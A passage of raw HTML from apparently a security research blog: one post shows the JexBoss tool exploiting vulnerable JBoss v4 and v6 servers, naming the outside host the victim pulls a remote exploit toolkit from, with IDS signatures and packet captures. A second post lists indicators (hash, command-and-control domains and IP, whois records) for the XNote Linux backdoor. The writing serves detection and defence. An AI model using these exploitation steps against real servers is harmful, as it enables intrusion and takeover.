<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0fZ5qbzZXuthM0c0mwiBdpTYfrkZJRIRGBAg6orzUSTrDoR-ZK4bjcuLwAAwFGjVfpi_z4RZmrwjvGSVZTD90yzYWuj2AGT9YrNZOaZ8Ovl3b9D756ZOETfCKFjjiUQj7eEIvAK-3-cg/s1600/jexboss_attacking_4a.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0fZ5qbzZXuthM0c0mwiBdpTYfrkZJRIRGBAg6orzUSTrDoR-ZK4bjcuLwAAwFGjVfpi_z4RZmrwjvGSVZTD90yzYWuj2AGT9YrNZOaZ8Ovl3b9D756ZOETfCKFjjiUQj7eEIvAK-3-cg/s640/jexboss_attacking_4a.jpg" width="590" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">JexBoss attack against a JBoss v4 host</td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
In this example, I ran the exploit against jmx-console. I then ran the linux 'ls' command to display the files on the compromised host.</div>
<div style="text-align: justify;">
Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "<i>jbossass.war</i>" from '<i><b>joaomatosf.com</b></i>'.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaMhyr-Dm9iSPfQLb6joBDuOnoV_U3KRTZI8WC8DsMXP2Jl3Ci4z0zsi1spjGv0_l6JU_ijuzpsFhOVkv8Bf-xYrS0mOWTWJNWBK13_uIFGk9VHpkSkOlBYJiNYa2afh9HUwYLrM8ZRbo/s1600/jexboss_fetch_remote.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaMhyr-Dm9iSPfQLb6joBDuOnoV_U3KRTZI8WC8DsMXP2Jl3Ci4z0zsi1spjGv0_l6JU_ijuzpsFhOVkv8Bf-xYrS0mOWTWJNWBK13_uIFGk9VHpkSkOlBYJiNYa2afh9HUwYLrM8ZRbo/s640/jexboss_fetch_remote.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Victim server fetching remote exploit toolkit</td></tr>
</tbody></table>
<br />
<br />
<div style="text-align: justify;">
Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.</div>
<div style="text-align: justify;">
Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
In this next example, I ran the exploit against the JBoss web-console.</div>
<div style="text-align: justify;">
Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice. Note how I used the 'curl' command to fetch a remote text file and display it on the console.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJn23xeLLTYwJNLyZQ14ID0K9IV3ivrSwnK8wVsI6hkQMADx2qVmCVNrgeGVYpAvSyVE04QahyOo2VEZauLiHKZDYf5yfg71OEERF3R2QhFYOmafZDNnSTMha2NeXj0n5wyp1gebvPBCA/s1600/jexboss_attacking_4b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="587" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJn23xeLLTYwJNLyZQ14ID0K9IV3ivrSwnK8wVsI6hkQMADx2qVmCVNrgeGVYpAvSyVE04QahyOo2VEZauLiHKZDYf5yfg71OEERF3R2QhFYOmafZDNnSTMha2NeXj0n5wyp1gebvPBCA/s640/jexboss_attacking_4b.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Using JexBoss to fetch a remote file via the compromised host.</td></tr>
</tbody></table>
<div>
<br /></div>
<div style="text-align: justify;">
In this example, I fetched the same file and saved it to the compromised host. Running the linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwV9mH2uS7OZlWSyxlEgMDu8ILRfGScAVw8iO8OydUYdXfa717ANONtYB5tpOIWsjCdnAdDUDM6qMma0mNyaEZCH-_2zwFtMXj0KUUtcrRcjsmSHPdjI_0NlEl7XkmclS3xUDWemiyws/s1600/jexboss_attacking_4c.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwV9mH2uS7OZlWSyxlEgMDu8ILRfGScAVw8iO8OydUYdXfa717ANONtYB5tpOIWsjCdnAdDUDM6qMma0mNyaEZCH-_2zwFtMXj0KUUtcrRcjsmSHPdjI_0NlEl7XkmclS3xUDWemiyws/s640/jexboss_attacking_4c.jpg" width="569" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: 12.8px;">Using JexBoss to fetch and save a remote file to the compromised host.</span></td></tr>
</tbody></table>
<div>
<br /></div>
<div style="text-align: justify;">
Here is a look at a log segment from the victim host after the exploits were run. A few exceptions are thrown, and Warnings and Info are logged.</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0vjVMZNYS9AWxikWxLXMF4kSMiF9Kgtu-csTquPyy88AhyXPsgr7X9c6OsNNlE60XfKYh9HyLoumJN_gqwVtvkX3oWkboUtAPV7_QedJv71bYr72_9FrvmI_nxSOcKuoQc8hz0JjUWRo/s1600/warnings.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0vjVMZNYS9AWxikWxLXMF4kSMiF9Kgtu-csTquPyy88AhyXPsgr7X9c6OsNNlE60XfKYh9HyLoumJN_gqwVtvkX3oWkboUtAPV7_QedJv71bYr72_9FrvmI_nxSOcKuoQc8hz0JjUWRo/s640/warnings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Log file segment showing Warnings and Info after JexBoss exploit</td></tr>
</tbody></table>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Attacking JBoss v6</u></h3>
<div>
<div style="text-align: justify;">
Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.</div>
<div style="text-align: justify;">
However, the jmx-console is as easily exploited as it was in JBoss version 4.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmIwRpyqUAVq3mrwfTdmbEXN3GMNlhiaTkbhix4sl_Bk1-HHfQk7encONyELKXBr2WgaA1rnj3w4zOBYbl6HTuSo0ext-mT9U0pWQJkm8LyAEv0b9CVBo3UBO1Rvnfo6oxQEBlJnR8v0/s1600/jexboss_attacking_6a.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmIwRpyqUAVq3mrwfTdmbEXN3GMNlhiaTkbhix4sl_Bk1-HHfQk7encONyELKXBr2WgaA1rnj3w4zOBYbl6HTuSo0ext-mT9U0pWQJkm8LyAEv0b9CVBo3UBO1Rvnfo6oxQEBlJnR8v0/s640/jexboss_attacking_6a.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">JexBoss exploit against the jmx-console on a JBoss v6 host</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9r8MYEPl1LXT0TIrSh2WcvZLYtpM7O38ulh82X55r_xP_GCcNWS-t32vwPvpYY1vsFXqR5MuXGt7Y3cWaKpb1aQcS-g8HaRpoX_mLl09Y10lHYzMahoPKh_e3i_s8VP7FvN00qb79Xg/s1600/jexboss_attacking_6b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="604" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9r8MYEPl1LXT0TIrSh2WcvZLYtpM7O38ulh82X55r_xP_GCcNWS-t32vwPvpYY1vsFXqR5MuXGt7Y3cWaKpb1aQcS-g8HaRpoX_mLl09Y10lHYzMahoPKh_e3i_s8VP7FvN00qb79Xg/s640/jexboss_attacking_6b.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: 12.8px;">JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch</span></td></tr>
</tbody></table>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Summary:</u></h3>
<div>
<div style="text-align: justify;">
By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.</div>
<div style="text-align: justify;">
With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it of critical urgency that any JBoss instance be checked and patched.</div>
<div style="text-align: justify;">
I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at <a href="http://www.cvedetails.com/vulnerability-list.php?vendor_id=1845&product_id=&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&month=0&cweid=0&order=3&trc=10&sha=1d05adb14b27835207e2b16060f6371f17f9652e" target="_blank">CVEDetails - JBoss</a></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim. We hope that this blog post helps raise further awareness to this serious threat, and provides some additional information to help detect and defend against these attacks.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Files and Additional Information:</u></h3>
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
IDS Signatures:</h4>
<div>
<div>
The following Snort and Emerging Threat IDS signatures will detect these JexBoss probes and exploits</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt</span></div>
</div>
<div>
<br /></div>
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
Packet Captures</h4>
<div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 6 host: </u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v6_victim_vantage.pcap" target="_blank">jexboss_attack_v6_victim_vantage.pcap</a></div>
<div>
<br /></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4a_victim_vantage.pcap" target="_blank">jexboss_attack_v4a_victim_vantage.pcap</a></div>
<div>
<br /></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4b_victim_vantage.pcap" target="_blank">jexboss_attack_v4b_victim_vantage.pcap</a></div>
<div>
<u><br /></u></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4c_victim_vantage.pcap" target="_blank">jexboss_attack_v4c_victim_vantage.pcap</a></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-40812301488247126652015-02-09T17:21:00.001-05:002015-02-10T00:06:22.427-05:00Linux.BackDoor.XNote.1 indicators<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;">We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.</span><br />
<span style="font-family: inherit;">Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: <a href="http://blog.malwaremustdie.org/" target="_blank">http://blog.malwaremustdie.org/</a></span><br />
<br />
Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host. The host is then used for a variety of functions, including as a DDoS bot.<br />
The DrWeb posts provide a very good analysis of the malware and its overall structure.<br />
<a href="http://news.drweb.com/show/?i=9272&lng=en&c=5" target="_blank">http://news.drweb.com/show/?i=9272&lng=en&c=5</a><br />
<a href="http://vms.drweb.com/virus/?i=4323517" target="_blank">http://vms.drweb.com/virus/?i=4323517</a><br />
<br />
We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.<br />
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.<br />
<br />
Upon execution, we noted the sample contact a DNS server on 114.114.114.114 with queries for the following domains:<br />
<br />
<ul style="text-align: left;">
<li>a.et2046.com</li>
<li>b.et2046.com</li>
<li>c.et2046.com</li>
</ul>
For each query, IP address <b>122.10.85.54</b> was returned for each of them.<br />
<br />
In our run, the malicious 'xnote' process was noted to have process ID of 1303. Using '<a href="https://github.com/volatilityfoundation/volatility" target="_blank">volatility</a>' to map information about the process memory, we noted:<br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">Volatility Foundation Volatility Framework 2.4</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">Pid Start End Flags Pgoff Major Minor Inode Path </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xc01000 0xc02000 r-x 0x0 8 1 405848 /home/mattyh/xnote</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0x8048000 0x81ba000 r-x 0x0 0 0 0 </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0x81ba000 0x81c4000 rwx 0x0 0 0 0 </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xa137000 0xa158000 rwx 0x0 0 0 0 [heap] </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xb78b6000 0xb78b7000 r-x 0x0 0 0 0 [vdso] </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xbf843000 0xbf859000 rwx 0x0 0 0 0 [stack]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: inherit;">Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">XXXXXXXXXXXXXXXX122.10.85.54</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">a.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">b.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">c.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">test</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">CAk[S</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;"> !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">-0123456789</span><br />
<br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">-0123456789</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="font-family: inherit;">Domain and IP Information:</span></h3>
<div>
<div>
It is interesting to note that the domain "<b>et2046.com</b>" has been seen before in other Linux ELF malware.</div>
<div>
<ul style="text-align: left;">
<li>Note <a href="http://ubuntuforums.org/showthread.php?t=2226673" target="_blank">this post</a> to an Ubuntu forum from May, 2014 where the subdomains '<b>kill.et2046.com</b>' and '<b>sb.et2046.com</b>' were noted in a running process on a compromised Ubuntu host.</li>
</ul>
</div>
</div>
<div>
<ul style="text-align: left;">
<li>Palo Alto Networks <a href="http://researchcenter.paloaltonetworks.com/2014/07/iptables-backdoor-even-linux-risk-intrusion/" target="_blank">discusses these same domains</a> in their post from July 16, 2014</li>
</ul>
</div>
<div>
<ul style="text-align: left;">
<li>Malware Must Die <a href="https://lh3.googleusercontent.com/-oJn44n_-rTs/U-JD9aJD1UI/AAAAAAAAQa0/ehKTVDEcfUU/s1576/001.png" target="_blank">posted an analysis</a> of the Linux iptablex malware where these domains were also seen:</li>
</ul>
</div>
<div>
<ul style="text-align: left;">
<li>Via VirusTotal searches, we find related malware to these domains:</li>
</ul>
</div>
<div>
<a href="https://www.virustotal.com/en/domain/sb.et2046.com/information/">https://www.virustotal.com/en/domain/sb.et2046.com/information/</a></div>
<div>
<a href="https://www.virustotal.com/en/domain/kill.et2046.com/information/">https://www.virustotal.com/en/domain/kill.et2046.com/information/</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">www.qtol.tv.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>122.10.85.54</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: inherit;">Additional information from DNSDB for the domain et2046.com:</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">count<span class="Apple-tab-span" style="white-space: pre;"> </span>54</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">first seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-12 17:13:42 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">last seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2015-01-13 17:23:33 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>a.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>b.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>c.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">count<span class="Apple-tab-span" style="white-space: pre;"> </span>329</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">first seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2013-12-17 17:13:33 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">last seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-11 17:12:29 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns155.dnsever.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns165.dnsever.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns179.dnsever.com</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: inherit;">Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution. This is a public DNS server based in China, with its web page at www.114dns.com</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdi9-JycBY2zOUjKgRrkbAKv-wui3jem5r8feZPkfQHtrboNhf2ejqCzk0AgoBpH53z5z89QxdykaWF9mn09uMGmDy0VPpiqWypXAvZS3eqTQPbP_ZJxDcFv4Z1gBn9XO7ct5g4DZNUWA/s1600/dns_114.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdi9-JycBY2zOUjKgRrkbAKv-wui3jem5r8feZPkfQHtrboNhf2ejqCzk0AgoBpH53z5z89QxdykaWF9mn09uMGmDy0VPpiqWypXAvZS3eqTQPbP_ZJxDcFv4Z1gBn9XO7ct5g4DZNUWA/s1600/dns_114.jpg" height="281" width="320" /></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<h3 style="text-align: left;">
<i><u>whois - 114.114.114.114</u></i></h3>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">inetnum: 114.114.0.0 - 114.114.255.255</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">netname: XFInfo</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: NanJing XinFeng Information Technologies, Inc.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Xuanwu District, Nanjing, Jiangsu, China</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">irt: IRT-CNNIC-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Beijing, China</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: ipas@cnnic.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">abuse-mailbox: ipas@cnnic.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Yan Jian</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: YJ1777-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: jyan@greatbit.com</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Zhao Zhenping</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: ZZ2094-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: ping@greatbit.com</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<h3 style="text-align: left;">
<i><u><span style="font-family: inherit;"><b>whois- 122.10.85.54</b></span></u></i></h3>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">inetnum: 122.10.80.0 - 122.10.95.255</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">netname: TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Royal Network Technology Co., Ltd. in Guangzhou</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: HK</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">admin-c: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">tech-c: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">status: ASSIGNED NON-PORTABLE</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-CN-TOINTER122</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-irt: IRT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: tengdayx@gmail.com 20150112</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">source: APNIC</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">irt: IRT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: abuse@gzroyal.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">abuse-mailbox: abuse@gzroyal.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">admin-c: RNTC1-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">tech-c: RNTC1-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">auth: # Filtered</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: hm-changed@apnic.net 20140919</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">source: APNIC</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Wei XeiJun</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Liwan District of Guangzhou, Guangdong Fangcun West 533</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">phone: +86.1234567890</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: tengdayx@qq.com</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: tengdayx@qq.com 20150111</span></div>
<div>
<br /></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<h3 style="text-align: left;">
<span style="font-family: inherit;"><i><u><b>'whois' for Domain et2046.com</b></u></i></span></h3>
<div>
<div>
<span style="color: yellow; font-family: inherit;">Domain Name: ET2046.COM</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registry Domain ID: 1762221508_DOMAIN_COM-VRSN</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar WHOIS Server: whois.godaddy.com</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar URL: http://www.godaddy.com</span></div>
<div>
